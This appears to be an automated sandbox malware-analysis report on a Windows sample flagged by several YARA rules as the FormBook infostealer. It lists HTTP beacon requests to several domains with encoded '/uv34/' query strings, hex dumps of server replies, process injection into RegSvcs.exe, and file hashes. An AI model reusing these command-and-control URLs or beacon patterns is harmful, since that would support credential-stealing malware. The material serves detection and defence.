                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.649738172.217.168.8380C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:04.093743086 CEST6156OUTGET /uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 HTTP/1.1
                                                                            Host: www.ihdeuruim.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:42:04.168349028 CEST6157INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 12 May 2021 06:42:04 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Server: ghs
                                                                            Content-Length: 1665
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32
                                                                            Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.64973934.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:09.292547941 CEST6159OUTGET /uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== HTTP/1.1
                                                                            Host: www.embraceblm.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:42:09.429548025 CEST6159INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 12 May 2021 06:42:09 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "609953af-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.64974045.39.20.15880C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:14.893963099 CEST6160OUTGET /uv34/?D0Dhj=OWF93oT5YKzzQXpFcytjmkfHvlUSZBJisBPI3VKZy/Exqh7cdZ6jotFcBNfsZIZ5A8+OquT2pg==&_JB=SL3d2L8 HTTP/1.1
                                                                            Host: www.ytksw.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:42:15.098475933 CEST6160INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Wed, 12 May 2021 06:42:15 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.649744173.236.152.15180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:20.500356913 CEST6170OUTGET /uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== HTTP/1.1
                                                                            Host: www.buraktradingltd.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:42:20.640997887 CEST6171INHTTP/1.1 301 Moved Permanently
                                                                            Date: Wed, 12 May 2021 06:42:20 GMT
                                                                            Server: Apache
                                                                            Location: https://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==
                                                                            Content-Length: 344
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 72 61 6b 74 72 61 64 69 6e 67 6c 74 64 2e 63 6f 6d 2f 75 76 33 34 2f 3f 5f 4a 42 3d 53 4c 33 64 32 4c 38 26 61 6d 70 3b 44 30 44 68 6a 3d 44 37 35 4f 73 44 6c 54 48 6d 61 34 6e 43 74 2f 58 48 68 56 51 54 76 65 64 48 76 71 4a 56 65 6a 33 43 45 47 4e 6e 46 64 64 42 73 30 35 66 48 45 76 47 30 39 49 69 74 51 46 56 52 6f 6a 56 4a 72 2f 54 6b 4a 78 4a 48 6c 59 67 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&amp;D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==">here</a>.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            7192.168.2.649745160.153.132.20580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:25.770747900 CEST6173OUTGET /uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 HTTP/1.1
                                                                            Host: www.bogolacke.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:42:25.841358900 CEST6174INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 12 May 2021 06:42:25 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding,User-Agent
                                                                            Content-Length: 1699
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 77 69 64 74 68 3d 22 31 30 30 22 3e 0a 20 20 20 20 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 35 30 2c 32 35 20 31 37 2c 38 30 20 38 32 2c 38 30 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75
                                                                            Data Ascii: <!DOCTYPE html><html><head><title>File Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" ><meta name="viewport" content="width=device-width, initial-scale=1.0"><style type="text/css">body { background-color: #eee;}body, h1, p { font-family: "Helvetica Neue", "Segoe UI", Segoe, Helvetica, Arial, "Lucida Grande", sans-serif; font-weight: normal; margin: 0; padding: 0; text-align: center;}.container { margin-left: auto; margin-right: auto; margin-top: 177px; max-width: 1170px; padding-right: 15px; padding-left: 15px;}.row:before, .row:after { display: table; content: " ";}.col-md-6 { width: 50%;}.col-md-push-3 { margin-left: 25%;}h1 { font-size: 48px; font-weight: 300; margin: 0 0 20px 0;}.lead { font-size: 21px; font-weight: 200; margin-bottom: 20px;}p { margin: 0 0 10px;}a { color: #3282e6; text-decoration: none;}</style></head><body><div class="container text-center" id="error"> <svg height="100" width="100"> <polygon points="50,25 17,80 82,80" stroke-linejoin="rou


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            8192.168.2.64974834.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:41.199654102 CEST6194OUTGET /uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== HTTP/1.1
                                                                            Host: www.albanyhumanesociety.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:42:41.336272955 CEST6195INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 12 May 2021 06:42:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "60995c26-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            9192.168.2.649749198.54.117.21780C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:42:51.992958069 CEST6196OUTGET /uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== HTTP/1.1
                                                                            Host: www.sandybottomsflipflops.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Start time:08:40:47
                                                                            Start date:12/05/2021
                                                                            Path:C:\Users\user\Desktop\00098765123POIIU.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\00098765123POIIU.exe'
                                                                            Imagebase:0xe50000
                                                                            File size:968192 bytes
                                                                            MD5 hash:4E2D6AB0C9A56AEE76BA33BD26DCE9B1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            General

                                                                            Start time:08:40:51
                                                                            Start date:12/05/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                            Imagebase:0x5a0000
                                                                            File size:45152 bytes
                                                                            MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
